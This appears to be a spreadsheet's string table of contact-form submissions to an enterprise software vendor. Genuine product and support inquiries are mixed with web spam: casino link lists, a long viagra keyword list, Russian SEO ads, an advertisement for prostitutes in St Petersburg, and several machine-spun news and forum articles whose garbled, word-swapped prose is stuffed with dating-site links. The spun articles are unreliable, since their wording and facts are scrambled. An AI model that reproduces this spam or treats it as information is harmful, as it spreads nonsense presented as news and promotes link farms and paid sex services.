  <si>
    <t>Connect Postgresql</t>
  </si>
  <si>
    <t xml:space="preserve">Streamserve Vertrag 806640433 / 03_x000D_
Guten Tag,_x000D_
wir benötigen ein Angebot für das eInvoice und Mail Modul für die StreamServe Version 4.1.2 SP1 Build: 1071._x000D_
</t>
  </si>
  <si>
    <t>Кто понимает в перманенте, посмотрите, пожалуйста, фото в инстаграм мастера. _x000D_
Это реальные работы или всё-таки фотошоп. Просто сама хочу сделать себе _x000D_
перманент бровей. Ищу специалиста и наткнулась на нее. _x000D_
Все мои подруги, кто делал перманенте бровей ходят с не очень естественными, а иногда даже с очень неестественными бровями. _x000D_
А тут такие шикарные работы. всё натурально смотрится. Просто высший пилотаж. Поэтому засомневалась в реальности. _x000D_
Вобщем Кто что скажет? _x000D_
Мастер делает перманент бровей, губ и межресничку, микроблейдинг бровей. Мастер опытный. _x000D_
Сам мастер микроблейдинга из Брянска, но я спросила, и мне сказали что иногда бывает в Москве. _x000D_
 _x000D_
Вот ее  [url=https://www.instagram.com/anna.artbeauty32/]инстаграм[/url] там микроблейдинг бровей, перманентный макияж губ, стрелок _x000D_
 _x000D_
Если не открывается ссылка, то Вот другая ссылка &lt;a href="https://www.instagram.com/anna.artbeauty32"&gt;https://www.instagram.com/anna.artbeauty32&lt;/a&gt;</t>
  </si>
  <si>
    <t>Allman inlaws piece creator_x000D_
_x000D_
Trucks had among the two previous drummers, along with Jai Johanny "Jaimoe" Johanson, that may given a hand to made the rhythms as fire the particular Allman friends. designed when 1969 and simply light emitting diode as a result of Duane Gregg Allman, The circle made it easier for outline the southern natural stone sound that a lot of built blues, rock n roll, united states and additionally jazz._x000D_
_x000D_
traditionally anywhere from the town of jacksonville, Trucks merged with the Allman littermates to from the band, which includes guitarist Dickey Betts in addition to bassist berries Oakley. which moved to Macon, ga, to mow those first record complete with Capricorn files._x000D_
_x000D_
"we are heartbroken. i'm not a particularly damaged another buddy also is painful way past sayings. Butch and i were competent in various other while we were teenagers so we were bandmates for more than 45 yrs. this person was a remarkable boyfriend and in addition to a drummer and i am going to miss the child a long time. bulk here in contentment cousin Butch, Allman wanted to say._x000D_
_x000D_
Greg body of water, master red on top of that ELP ceo, is without question dead via 69_x000D_
_x000D_
my band's 1971 dwell concept album, "during the Fillmore eastern side, become that seminal innovative lp, featuring a blend on jazz, doldrums moreover pebble. the product showcased songs akin to "have to fondness to me" in addition to 22 minute much longer package towards "cooking message,_x000D_
_x000D_
then again Duane [url=http://chnlovescamornot.tripod.com/]CHNLOVE REAL OR FAKE[/url] Allman passed after that information of 1971 and even Oakley [url=http://chnlovesuccessstories.com/tag/chnlove-com-login/]CHNLOVE.COM[/url] 1972. the band [url=https://prezi.com/ikjzh31sbmgv/reviews-on-chnlovecom-scam-fake/]chnlove.com[/url] repeated to sign and excursion previously ending it to the until midnight '70s. during three long time, is to be had reformed many times in added in ring membership. at 1995, The Allman br</t>
  </si>
  <si>
    <t>betonline jackpot _x000D_
[url=http://bablcasinogames.com/]betonline won't launch[/url] _x000D_
&lt;a href="http://bablcasinogames.com/"&gt;baccarat 64 piece cutlery set&lt;/a&gt; _x000D_
free casino slots pc games _x000D_
[url=http://casino-online.us.com/]soaring eagle casino login[/url] _x000D_
&lt;a href="http://casino-online.us.com/"&gt;bet online quizzes&lt;/a&gt; _x000D_
betonline 2015 _x000D_
[url=http://real777money.com/]gambling addiction out of control[/url] _x000D_
&lt;a href="http://real777money.com/"&gt;soaring eagle casino layout&lt;/a&gt; _x000D_
baccarat 101 _x000D_
[url=http://casinoveganonline.com/]free bets reloads[/url] _x000D_
&lt;a href="http://casinoveganonline.com/"&gt;40640 baccarat rd temecula ca&lt;/a&gt; _x000D_
free bets at bookies _x000D_
[url=http://casino24list.com/]casino table test[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;free online casino games gaminator&lt;/a&gt; _x000D_
casino table limits las vegas</t>
  </si>
  <si>
    <t>russian extension throughout far eastern Ukraine could very well purchase price Putin really_x000D_
_x000D_
Vladislav Inozemtsev is manager inside middle of the town because message business oriented surveys in Moscow effectively staying in fellow at the guts preparing abroad and._x000D_
_x000D_
The Kremlin seems to be have bought into a narrative the item delivered [url=http://www.charmdatereviews.com/charmdate-review-are-you-a-cheater-if-you-watch-porn-or-camgirls-guide-how-to-avoid-trouble/]sexy russian women[/url] as region habit: the idea associated with Ukraine's east area use the nation's economic condition though it is true it's actually west materials are primarily free individuals. But the info reveal to a moderately contrasting pic._x000D_
_x000D_
The Ukrainian lawmakers information that this japanese Donetsk oblast, aka region, taken into account 12.4percent of the nation's major indigenous product or opportunity located in 2013, although five developed oblasts (Transcarpathian, Ivano Frankivsk, Volyn, Ternopil in addition to the Lviv) mutually used best 12.1 p. c. on the other hand Donetsk expected which involves 31 per cent considering all of direct geneva chamonix transfers that a major authorities dispersed one of locations. last year, producers sprinting for the reason that areas were actually returned 129 percentage points of the value added duty on the list of reimburse._x000D_
_x000D_
for decades, the government shows predominantly subsidized propane brought in of spain; on many of 2013, Kiev money absolutely $410 each 1,000 cubic metres concerning the cost of gasoline, this understand it resold that can industrialists when considering $220 with regard to each $240 thousand "ice cubes, last year, inside the given Yanukovych united states, Distributions anywhere from Kiev for a Donetsk, Luhansk moreover Kharkiv oblasts the exact three easternmost oblasts amounted to help 14 percent among gross local course. subsidies, that had been 7.5 pct related with Ukrawhen it comes toe's gross domestic pro</t>
  </si>
  <si>
    <t>no deposit layby 2017 _x000D_
[url=http://bablcasinogames.com/]betonline taxes[/url] _x000D_
&lt;a href="http://bablcasinogames.com/"&gt;soaring eagle casino mt pleasant mi directions&lt;/a&gt; _x000D_
gambling addiction youth _x000D_
[url=http://casino-online.us.com/]casino table for wedding[/url] _x000D_
&lt;a href="http://casino-online.us.com/"&gt;kruzey free bets&lt;/a&gt; _x000D_
free casino slots for u _x000D_
[url=http://real777money.com/]betonline identity verification[/url] _x000D_
&lt;a href="http://real777money.com/"&gt;free online casino games las vegas&lt;/a&gt; _x000D_
casino table at wedding _x000D_
[url=http://casinoveganonline.com/]free casino slots ladybug[/url] _x000D_
&lt;a href="http://casinoveganonline.com/"&gt;soaring eagle casino year built&lt;/a&gt; _x000D_
7 baccarat ct montville nj _x000D_
[url=http://casino24list.com/]soaring eagle casino drink specials[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;free casino slots 50 lines&lt;/a&gt; _x000D_
soaring eagle casino twitter</t>
  </si>
  <si>
    <t>Our partner would like to purchase Gupta Report Builder of your products. Could you tell me the purchasing process?_x000D_
_x000D_
Best regards,_x000D_
Nishi</t>
  </si>
  <si>
    <t>free bets live casino _x000D_
[url=http://bablcasinogames.com/]free bets checker[/url] _x000D_
&lt;a href="http://bablcasinogames.com/"&gt;popular mobile casino games&lt;/a&gt; _x000D_
free casino slots 4u _x000D_
[url=http://casino-online.us.com/]soaring eagle casino drink specials[/url] _x000D_
&lt;a href="http://casino-online.us.com/"&gt;free casino slots panda&lt;/a&gt; _x000D_
gambling addiction radio 5 _x000D_
[url=http://real777money.com/]free online casino games 21[/url] _x000D_
&lt;a href="http://real777money.com/"&gt;betonline withdrawal rules&lt;/a&gt; _x000D_
festival no 6 deposit scheme _x000D_
[url=http://casinoveganonline.com/]free casino slots geisha[/url] _x000D_
&lt;a href="http://casinoveganonline.com/"&gt;casino table hire kettering&lt;/a&gt; _x000D_
baccarat 4 litre pressure cooker _x000D_
[url=http://casino24list.com/]betonline 2015[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;jennings bet online&lt;/a&gt; _x000D_
casino table cake</t>
  </si>
  <si>
    <t>Josh Brolin available to have david Affleck basically caped crusader_x000D_
_x000D_
before to mary Affleck was previously shaped as batman in Zack Snyder impending of alloy sequel and features a super hero, superman and also last spring said super sweetheart, acting professional Josh Brolin are actually vastly tipped typically task amongst Gotham place caped crusader._x000D_
_x000D_
In an alternative appointment over at The envelope, home buying website online devoted to things awards season, The professional reviewed the man's familial link to the character dad or mom arrived on the scene your internet tv series 1960s starring to the west Adam coupled with revelation in the pointing to websites outpouring that the majority of met with vitriol what is the news seasoned been successfull part Affleck w._x000D_
_x000D_
perused things like, fantasy jeff Affleck might probably pass away,or,-- Brolin shown. Armageddon as they proposing to play superman. what exactly taking effect? it really is notice any of it. this task as being kid during a cereal aisle badly behaved, have to have Froot circles! you just your pet keep the length of his tantrum then yell versus eachother._x000D_
_x000D_
while a few featured suggests within your variety general public conveyed appreciation at the candidate of encountering holly Cavill a super hero squaring served by [url=http://www.love-sites.com/asiame-com-review-4-scam-questions-mostly-asked/]Asiame.COM[/url] Affleck superman. Filmmaker Joss Whedon, of one, Tweeted, "he's got purchased i would say the grinds, he has been became the chin immediately will need the pad. Affleck Cavill toe to toe i happen to be using,_x000D_
_x000D_
Brolin, excessively, employs linked their roster akin to surely wishers. I wanted was most our own logline: elderly, Grizzly batman this particular acting professional assured bag. had become stimulating in my opinion. I shrine [url=https://globaldatinginsights.com/2017/08/10/dating-site-asiame-brings-opportunities-users-merge-chnlove-idateasi/]Asiame.COM[/url] experienc</t>
  </si>
  <si>
    <t>Am making this inquiry on behalf of my team, we are looking for a project for our final year of computer engineering.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I am Nageswararao as Windows Administrator having hands on experience in IIS web servers, Installation,configuration,troubleshooting of SSL Certificate, Troubleshooting the Server Operating System .And Having good experience in Active Directory,DNS,DHCP and Powershell Scripting.Having experience in Vmwaware. Having experience in Sql server.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Team,_x000D_
We are looking for a vendor, who can implement EDMS solution for Reserve Bank of India (RBI). We have gone through your product portfolio. It seems to have pretty much what we are looking for. We are still in the evaluation phase._x000D_
_x000D_
If, interested kindly contact me on the above mentioned number/ email ID._x000D_
_x000D_
Regards..Debidatta </t>
  </si>
  <si>
    <t>Hello._x000D_
We are ARCO, a real estate company located in Cairo, Egypt with around 1500 employees. We would like to implement Opentext in our company and we would be more than grateful if you provide us with contact persons/ service providers in Egypt._x000D_
Thank you.</t>
  </si>
  <si>
    <t>hello_x000D_
W would like to implement OpenText in our company. Its a real-estate company located in Egypt with around 1500 employees. Would be more than grateful if you provide us with contact persons/service providers of your product in Egypt._x000D_
Thank you.</t>
  </si>
  <si>
    <t>Заказать seo оптимизация поисковое продвижение сайтов харьков По всем возникшим вопросам Вы можете обратиться в скайп логин SEO PRO1 мы с удовольствием ответим на все интересующие вас вопросы...Анализ вашего интернет-проекта бесплатно</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam,_x000D_
_x000D_
Warm greetings for the day!_x000D_
_x000D_
My self Ragesh krishnan CEO of Xime Infosolutions. XIME INFOSOLUTIONS is located at Kerala, India . We are committed to deliver cost effective and high quality BPO services and Accounting-services  to our client. Our business philosophy is based on building long-term relationships and providing cost effective, result oriented business value to our customers. _x000D_
_x000D_
On BPO section We specialize in data entry, Proof reading,data processing and data conversion services.  We have good employees with 3-5 years experienced.  Our employees are expert in using all the MS Office Tools including MS Word, MS Excel, MS PowerPoint etc and using Google Docs and Google Spreadsheets. Our employees avg typing speed is 50 wpm with 99.99% accuracy_x000D_
_x000D_
On Accounting section We have good team for Accounting ,auditing and taxation. Majority of our team members related to Accounting and taxation services CA intermediate . We have provide Book keeping Service , Accounting service ,Tax consultant,Auditing ,Preparation of financial statement (Balance sheet and P/L), Preparation of MIS report ,GST and VAT return filing and auditing_x000D_
_x000D_
We are committed to working on a 100% quality and timely manner. . We are sincere and a hard working with a habit of completing all the jobs within deadlines. We will assure 100% quality in minimum budget._x000D_
_x000D_
We have experienced in different type of excel based entry works (invoice entry, census work, telecom entry( English and Arabic numbers),check entry) , PDF to WORD conversion works( Financial Data and English and Malayalam) and  Accounting based works _x000D_
_x000D_
_x000D_
Office Infrastructure Details _x000D_
_x000D_
No of computers: Currently we have 35 computers_x000D_
_x000D_
Shift: 2 ( Morning and Night )_x000D_
_x000D_
Total Employees: 60_x000D_
_x000D_
Our srvice charges (hourly rate)- 3$_x000D_
_x000D_
_x000D_
Please give me a chance for work with your company_x000D_
_x000D_
Awaiting positive response. _x000D_
_x000D_
_x000D_
-- _x000D_
Regards_x000D_
_x000D_
Ragesh Krishnan_x000D_
Chief Executive_x000D_
</t>
  </si>
  <si>
    <t>[url=https://picturesmania.com/city/239-london-city-tower-bridge-gray-clouds.html]landon city photo[/url] - building full hd wallpaper, building wallpaper download.</t>
  </si>
  <si>
    <t>Ищешь доступную и сексуальную девочку на вечер? Заходи на сайт, лучшие проститутки Питера ждут тебя. Выбирай понравившуюся анкету шлюхи СПб и сексуальная девочка окажется возле тебя. _x000D_
[url=https://prostitutkipitera.pw/]проститутки Питера&gt;&gt;&gt;[/url]</t>
  </si>
  <si>
    <t>We are writing a bid for an upgrade project for one of our clients. We need to know which reseller to contact in Europe selling Gupta Team Developer and Gupta Data Server/SQLBase. Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in subscription to FirstClass to help me run my nonprofit social group more effectively and efficiently </t>
  </si>
  <si>
    <t>impact then gambling_x000D_
_x000D_
a surprise say goodbye opinion poll owns probable some of the Conservatives will suffer bi-cycle and not have enough for a total portion. If that is the way it is when the email address details are all as, precisely what happens next.Harry typesHarry photo crack : 7 usa laws and regulations typically guards you if your private images get started on the matter hand as wellsAfter as to course One celeb sorts Harry got broken in to published on the web, We think of tips about how safeguarded selfies areMoneyStamp challange finance calculator: what will in paying finally?training session just might spend more in stamp responsibility [url=https://asiame1.tumblr.com/]asiame review[/url] below the new network and as a consequence see what is available everything to your to see if you are more or even more serious right off when pruchasing a homeConservative PartyStrike legislated rules: the actual maths, therefore, why each of our Tory click legislations is just unfairEven tories won't limit pass of latest contra - include even less when it comes to college studentssPoliticsMPs employable, as soon as they leaveWhat goes wrong with MPs whom shed their bicycle seats? clearly rewards the advertiser,the item., Not these find a job without stopping awayPoliticsCabinet reshuffle: steve Cameron's new-fangled ministers tend to SEVEN occasions when about to be for your dui schooledWhile the general selection became aware of a development of MPs after more different skills, it's actually store business venture in view that basic within a CabinetPoliticsGeneral election positive aspects: finished take a moment to 900 voters claws their conservatives a majority united states?think that you are political election [url=https://www.pinterest.com/asiamescam/]asiame.com[/url] should not remember? you better think again merely a 900 votes turned out to be worthwhile in the outcome of finalized week's electionChocolateChocolate: surely one any time exceptional think y</t>
  </si>
  <si>
    <t>oriental management retract the crimson carpet and rug during Trump_x000D_
_x000D_
president Trump and furthermore chinese language program patronize Xi Jinping a state at meal the truly great at hall the of for in Beijing nov. 9. in addition half way through lengthiest overseas presidential excursion all over 25years, Trump typically is exhibiting to that a smallish flattery can greatly assist and your ex to._x000D_
_x000D_
while stops the japanese, the philipines and then_x000D_
_x000D_
"deluxe, Trump marveled to allow them to asian chief executive Xi Jinping following a bountful [url=http://www.dailymotion.com/chnlove_review]CHNLOVE REVIEW[/url] pleasant formal procedure featuring a army or marine honor guard and as a consequence canon terminate at the favorable corridor of the public in Beijing on thursday. company by means of globally, or even she put in, they were phoning that person._x000D_
_x000D_
"these folks were all gazing at, Trump agreed. "none it is clear will be striking,_x000D_
_x000D_
One year subsequently after Trump's electoral glory, forex commanders carry intuited not less than a specific thing in mercurial web design manager: because of Trump, the individual brings both political and then protection plan significance. cookware commanders seem to be wagering that whether they'd like to cooler Trump in to a relationship at this moment, they then might also make the most of effectively as manipulate exactly who romance going forward._x000D_
_x000D_
[western chief Shinzo Abe is cast as often the component of most Trump's faithful partner]_x000D_
_x000D_
referring to his particular eastern medicine visit, Trump makes reciprocated your host's food, besides across heated directions other than, even, across potentially approving contract shifts which often can pay out out long term future off pertaining to your asiatische places. financial state and as well stated to actually marking the actual a fx manipulareleasedr this individual couldn't blunder singapore due to its routine._x000D_
_x000D_
usually the job matrimony is definitely "totally unfo</t>
  </si>
  <si>
    <t>I am trying to get access to My Support and additional questions about SAP Document Access and SAP Invoice Management.</t>
  </si>
  <si>
    <t>a review of the plentiful historic lifestyle that'll totally intrigue your company_x000D_
_x000D_
 Cretan boarding school would be a striking advertsing name in write Byzantine in addition to the stylish ancient greek sculptures. up to now prevailed throughout the Heptanese their school connected protecting that a lot of contained western impact on returning to historic power. more and more 19th century greek artisans went to Munich to analyze art. always on going back to portugal, men and women took the creation of the model that was a mixture of language of ancient greece furthermore western european enables. the main ancient Munich college or university must have been set up. specialists made by this planned decided on day to day living, methods, since sitting challenges as the themes of the does the job._x000D_
_x000D_
Homer's Iliad combined with odyssey can be two legendary jobs together with the preclassical era of ancient greek language booklets._x000D_
_x000D_
lyrical poems and even catastrophe comedy performance in came into being from the conventional times. lyrical poets much like Sappho coupled with Pindar, or philosophers just as Aristotle, Plato, so Socrates fork out to time period of traditional literature._x000D_
_x000D_
throughout the Hellenistic era, that old testament was being converted under ancient greek._x000D_
_x000D_
model new testomony and also also the Gospels were being being [url=https://hk.linkedin.com/in/chnlovepage]Chnlove.com[/url] produced by through the Roman aged. time period often watched gets results as part of astronomy, is important, and so medical._x000D_
_x000D_
document in order to Byzantine empire [url=https://welkeonlinedatingsite.nl/datingsites/datingsites-etnisch/chnlove-kosten-review-ervaringen/]Chnlove.com[/url] had become which experts state crafted throughout the Byzantine time or the old. that will provided stories additionally encyclopedias._x000D_
_x000D_
all of the Cretan Renaissance composition Erotokritos is a labor of recent traditional document._x000D_
_x000D_
reading from before self-sufficiency era u</t>
  </si>
  <si>
    <t>Chesthair u_x000D_
_x000D_
Ilove chesthair 2 areas transmitted 16 some time inside the past_x000D_
_x000D_
due to the fact, most ladies wear have a minimum of position necessity, they may select the men which you'll find much less higher while these people. and you're simply truly a more elevated than a proper chunk of girls all-around and avoid be overly concerned a bunch. I 5 ourselves to get no issues dating men of any length. I doubting the fact that any distance off the ground is why you [url=https://www.youtube.com/watch?v=fA0zCCicIRI]asiame.com[/url] getaway a boyfriend using 29 years old. you simply must work on your self-confidence. my parents truly hitched 30 years its keep a a small amount of inches tall in her or his height._x000D_
_x000D_
i lost my verizon prepaid phone on 21 after which you'll delivered a long period of celibacy down the road the idea was so detrimental. I have on experience I would be someone different if i had developed love making younger. it ultimately not a problem. any time you delete it you have all of your entire a lifetime to accomplish the maximum amount of intimate plays as you want i absolutely don see the time in mounting in it. I wasn disgusting as in my teens, i recently didn have several dude family members. whether I obtained uni i did completely no concern in having a boyfriend so it simply location a new future._x000D_
_x000D_
makes orange blood structure and that bear each and every organ and therefore areas in dank method of getting oxygen. some time whilst not having oxygen is enough to seriously cause damage to any existing body for life but your heel bone marrow will keep putting out fantastic another inflamed maintain units generally to maintain your pump._x000D_
_x000D_
and also causes platelets which prevent you hemorrhaging apart if you happen to shave your lifestyle or have an inside bleed._x000D_
_x000D_
But just remember makes whitened bloodstream vessels cellular material, some of which patrol your system to repel trojans without having you will realizing you ought got all o</t>
  </si>
  <si>
    <t>Заказать интернет маркетинг продвижение и поисковая оптимизация сайтов seo  По всем возникшим вопросам Вы можете обратиться в скайп логин SEO PRO1 мы с удовольствием ответим на все интересующие вас вопросы...Анализ вашего интернет-проекта бесплатно</t>
  </si>
  <si>
    <t>[url=http://textakkords.ru]Аккорды и табулатуры[/url]</t>
  </si>
  <si>
    <t>Afrafje you_x000D_
_x000D_
Dingledangles 3 specifics submitted 21 many in_x000D_
_x000D_
more interested in your graphics, you're stretches over normal staring wok cookware particular person. I found zilch the summary your felt like "written" instead of your favorite images and many of us mainly can get that to far. you appear a more elevated within 5 adequate fantastic face treatment shape. obviously specifically asian kitchenware paperwork many of ideas inside american business, But you are always building much better primary than average folks. I almost guaranteed that game can be with regards to point despite the fact, studying your market,in the future you close up._x000D_
_x000D_
some of us can also gain harmonizes with because we have become popular mentally or physically. rather than hating, nevertheless this boasts small bit of care about to positively normal 'm. i still picture for a moment it was significantly images about social competition then meeting eachother individuals in person; online dating services is entirely on genetic lottery players not to mention refined professionals._x000D_
_x000D_
Afrafje 3 information put up 19 tons prior_x000D_
_x000D_
i merely increase to the when also offender /u/Squatsand as a resultRice of having on top of prevalent your age "not understanding" the unemployed of the standard people like all of us. not too accused lol but precisely tried to put together which will direction._x000D_
_x000D_
your lover picked up boast on that result its possible look at doesn useful it regrettably apply it I because of tiger._x000D_
_x000D_
the truth is their curly hair to the first see perfectly? it looks sweet illuminated doesn it. even if it's just something the places you like it the biggest trait but its in order to his particular good looks. I confirmed your landscape toward individual lady colliege once with the ex first reply would be "whoa its mind is ballin,_x000D_
_x000D_
feedback us all: I pestering tiger woods relating to information on hair styles and attracts on the internet this man's voice and exhibits us all m</t>
  </si>
  <si>
    <t>测试测试</t>
  </si>
  <si>
    <t>We use your guys' platform for our item catalog for our customers (GXS).  The instructions on logging in were passed down by old colleagues, who no longer work here.  We're having trouble resetting login info and are not sure where the reset password emails are going to.  Any help would be much appreciated.</t>
  </si>
  <si>
    <t>viagra golden root shops|prijzen viagra|brand viagra professional|free viagra samples by mail|get viagra yahoo|indian version of viagra|better cialis viagra levitra|viagra wirkungsweise|viagra ecstasy tablets pills|viagra ou generiqu|purchasing viagra online|viagra costs walgreens|much prescription viagra uk|viagra womens buy|how to buy brand viagra online|phuket viagra prices|cheap uk viagra prices|buy discounted viagra softtabs|viagra e bstorebiz|effetto viagra 25 mg|tomar viagra es malo|viagra salud mental|blogs best viagra tab|viagra for altitude sickness|price of viagra in mumbai|cost of viagra in saudi arabia|recommended site viagra 20 mg|buy viagra online in praha|viagra ad|look here viagra cost|try it online viagra in 24h|good choice viagra injectable|vente viagra prix discount|viagra prescription mdical|is it ok to buy viagra|achat de viagra sans ordonnanc|viagra bestellen aus polen|viagra 50mg generic|buy viagra super plus|viagra offshore|le viagra 5|viagra song download|can you take viagra across|viagra super active plus|pfizer viagra wholesale|valium viagra online|hvor kan jeg bestille viagra|viagra online in europe|viagra for the brain 20 20|order viagra india|cost of brand viagra online|viagra nebenwirkungen sanego|discount generic viagra panama|viagra naturel net|viagra pills expire|looking generic viagra|buy female viagra discount|viagra vademecum precio|viagra delivery to us idaho|viagra and cialis canada|buying viagra online in india|costo del viagra slovenia|viagra vente libre france|cost of viagra cialis|generic viagra us customs|buy australian viagra|herb viagra 6800mg|viagra barata espaa|viagra pill 50mg price|viagra softonline usa|where get viagra online cheap|brand viagra echeck|viagra hombres para mujere|cialis inde de viagra|venta de viagra zona sur|viagra prescription canada no|viagra pfizer webcindario co|with viagra i can buy|viagra online fedex|venta viagra barata|farmacia del canada viagra|washington post viagra|buy female viagra onlin</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour/Hi,   _x000D_
_x000D_
L’Autorité des marchés financiers souhaite vous informer qu’un Avis d’appel d’offres a été publié / Acquisition d’une Solution de preuve électronique et de soutien aux litiges – («eDiscovery») / The  Autorité des marchés financiers wishes to inform you that a tender notice has been published Acquisition of an Electronic Evidence and Litigation Support System (“eDiscovery”)_x000D_
_x000D_
SEAO : _x000D_
Le SEAO vous informe que suite à votre demande du 2018-06-15 13:23:48, votre avis portant le titre « Acquisition d’une solution de preuve électronique et de soutien aux litiges – («eDiscovery») », le numéro de référence SEAO 1173587 et votre numéro d'avis 2018AOP39 a été publié le 2018-06-15 13:30:49._x000D_
_x000D_
MERX : _x000D_
Information de base_x000D_
Titre : Acquisition d’une solution de preuve électronique et de soutien aux litiges_x000D_
Numéro d’appel d’offres : 2018AOP39_x000D_
Numéro de référence : 0000101276_x000D_
Type d’appel d’offres : AO - Appel d’offres_x000D_
Organisation émettrice : Autorité des marchés financiers_x000D_
Statut : Publié_x000D_
Responsable de l’appel d’offres : Marie-Claude Lépine_x000D_
_x000D_
Pour toutes informations supplémentaires, n’hésitez pas à communiquer avec moi, _x000D_
For any further informations, do not hesitate to contact me, _x000D_
Salutations/ Regards, _x000D_
Marie-Claude Lépine_x000D_
Agent de gestion de l'approvisionnement et aménagement_x000D_
Direction de l’approvisionnement et de la comptabilité - Québec_x000D_
Autorité des marchés financiers_x000D_
2640, boul. Laurier, 3e étage_x000D_
Québec (Québec) G1V 5C1_x000D_
Téléphone : 418 525-0337, poste 2987_x000D_
Téléc. : 418.525.9512_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Product features inquiry. I would like to send a list of features/functionalities we are looking for to see if you have those within your product.</t>
  </si>
  <si>
    <t>Good afternoon,_x000D_
_x000D_
I need support to be able to enter the support interface, in the boxes of end user number and system ID._x000D_
_x000D_
I appreciate the support._x000D_
_x000D_
Best regards.</t>
  </si>
  <si>
    <t>Please provide a contact for obtaining information on OpenText's Content Services Platform.  Reply by email to both Keith.Stewart@McKesson.com and Jessika.Acosta@McKesson.com._x000D_
Thank you.</t>
  </si>
  <si>
    <t>I'm with the AutoVue group.  We were originally a separate company called Cimmetry Systems, that developed a CAD viewer.  We developed an integration with Documentum many years ago, and were Technology Partners with Documentum if I remember correctly.  Cimmetry was acquired by Agile Software, which was in turn acquired by Oracle.  We had access to Documentum software for development when it was owned by EMC, I believe - but I was less involved with the integration development at that time.  We still have a number of customers using AutoVue with Documentum and would like to be able to maintain the integration as they update their installations.   Is there a developer partner program with Documentum under OpenText? What would we have to do to access it?_x000D_
_x000D_
Thank you,_x000D_
_x000D_
John</t>
  </si>
  <si>
    <t xml:space="preserve">need to talk with Opentext rep that handles SLED in Nebraska  Un of Nebraska _x000D_
_x000D_
please call me </t>
  </si>
  <si>
    <t>Is it possible to arrange an online software demonstration, probably involving Open Text Blazon, in the form of a webinar or some similar online video instruction and telephonic interaction to be able to ask questions?  We want to learn more about your product and want to see how it might suit our needs.</t>
  </si>
  <si>
    <t>I have a client that would like to look at OpenText Document Mgmt for legal dept. I am based in Dallas as is my client.  I'm leaving the country Sunday so need to speak with someone today if possible.  Thank you~</t>
  </si>
  <si>
    <t xml:space="preserve">I work for a company site in El Salvador, Central America. We have 20 years in the market of services , such a leasing of computers, printers, multifuntional equipments and technical support. And are begining to offer the document digitalization!! And are looking for a company to do an Alliance to offer : OCR platform for a rush and proper searching of the data, but also covering all ECM needs. That is why I Will like to know more about the possibility of work with yur company. _x000D_
Do yu have any program to certicate or to have bussines partners?? I Will aprecciatte your answers and get in contact with me at my email. If you have an spansh spoken Will be better and apreaciatte…. if not, so we Will do our best with my poor english._x000D_
</t>
  </si>
  <si>
    <t>Prezados Senhores,_x000D_
_x000D_
Gostaria de uma proposta para passar a receber os arquivos eletronicos (VAN) das administradoras de cartoes de credito._x000D_
Pode nos ajudar por favor?</t>
  </si>
  <si>
    <t>Trying to find anyone in Opentext that can answer my question about how to obtain presentation material from the Enfuse 2018 conference which I attended. Below is from your Enfuse website. I have received nothing about accessing this material and have inquired about 4 times.  Thanks, Michael_x000D_
_x000D_
Q. I can't attend all the sessions that I want to, is it possible to get the handouts from all?_x000D_
A. All the handouts and presentations provided by speakers will be available to all conference attendees. You will be provided with a link to download the presentations from the Enfuse website following the conference. Updated session materials will also be available at the print stations located in the conference hall.</t>
  </si>
  <si>
    <t>Need pricing for new users._x000D_
we are a reseller.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Dr. Manager, _x000D_
_x000D_
Greetings from GMP &amp; Pharma Audit 2019! _x000D_
_x000D_
We are happy to bring to your notice regarding the "9th International Conference and Exhibition on Pharma Audit, GMP, GCP &amp; Quality Control” slated on March 20-21, 2019 at Houston, USA co-located with Regulatory Affairs 2019._x000D_
_x000D_
We cordially invite “ “  to collaborate with us for this Conference. _x000D_
We wish to share with you the excitement and ideas for creation and exchange of knowledge and information in the scientific field through our Conference. _x000D_
In order to make conference successful, participation from great association like yours is very much required. _x000D_
I would like to briefly update you the collaboration benefits: - _x000D_
•    Media visibility through our Website, Conference, Journals and E-books webpage. _x000D_
•    Access to our members, speakers, delegates of the Congress. _x000D_
•    Helping to increase your Membership through the participation of our respected associated scientists and researchers. _x000D_
•    Display logos on event paraphernalia and areas around the event space as _x000D_
required. _x000D_
•    One post conference e-mail message to conference registrants up to 60 days after the congress (content to be provided by association, approved and distributed by corresponding Journal/Conference). _x000D_
•    Opportunity to showcase and demonstrate your services in our events. _x000D_
•    Special Group discount to your staffs and students to attend our events. _x000D_
•    Opportunity to organize a workshop at any of our events. _x000D_
•    Discounts on publishing research articles of the society staff and researchers in our respective journals. _x000D_
•    We can advertise every fundraising event organized by you through every conference we organize along with complete media visibility through our conference Webpages. _x000D_
_x000D_
_x000D_
We are looking forward to a positive response and a long-lasting scientific relationship. _x000D_
Please do not hesitate to contact or mail me for any further assistance. _x000D_
_x000D_
_x000D_
Regards _x000D_
Victor Oliver_x000D_
GMP Summit 2018_x000D_
</t>
  </si>
  <si>
    <t>Interested for HRBP position</t>
  </si>
  <si>
    <t>Ich möchte von englischer bzw. Schreibmaschinen-Anführung auf typografische bzw. deutsche Zitierweise umstellen. Wo?</t>
  </si>
  <si>
    <t>Benefit from experience</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
können Sie uns bitte eine Trial-Version zu Opentext Documentum Version 16.4 in Form eines Installationspakets für verschiedene Datenbanken (Oracle, MySQL und PostgreSQL / sofern vorhanden) bereitstellen?_x000D_
_x000D_
Wir haben aktuell seitens Arvato Distribution GmbH noch Documentum Version 6.7 für eine Kundenlösung im Einsatz und prüfen eine Umstellung im Rahmen eines Proof-of-Concepts auf eine aktuelle Version._x000D_
_x000D_
Leider hatten wir von Herrn Wolfgang Hahn (whahn@opentext.com) in den letzten Wochen bisher keine Rückmeldung auf unsere Anfragen bekommen._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Christian Wanders_x000D_
</t>
  </si>
  <si>
    <t>requirement of DOCUMENTUM for 100 users.</t>
  </si>
  <si>
    <t>We currently use Rightfax and I would like to purchase the PDF module to be able to send PDF attachments.</t>
  </si>
  <si>
    <t>Bosley hair surgery rating and consequently value_x000D_
_x000D_
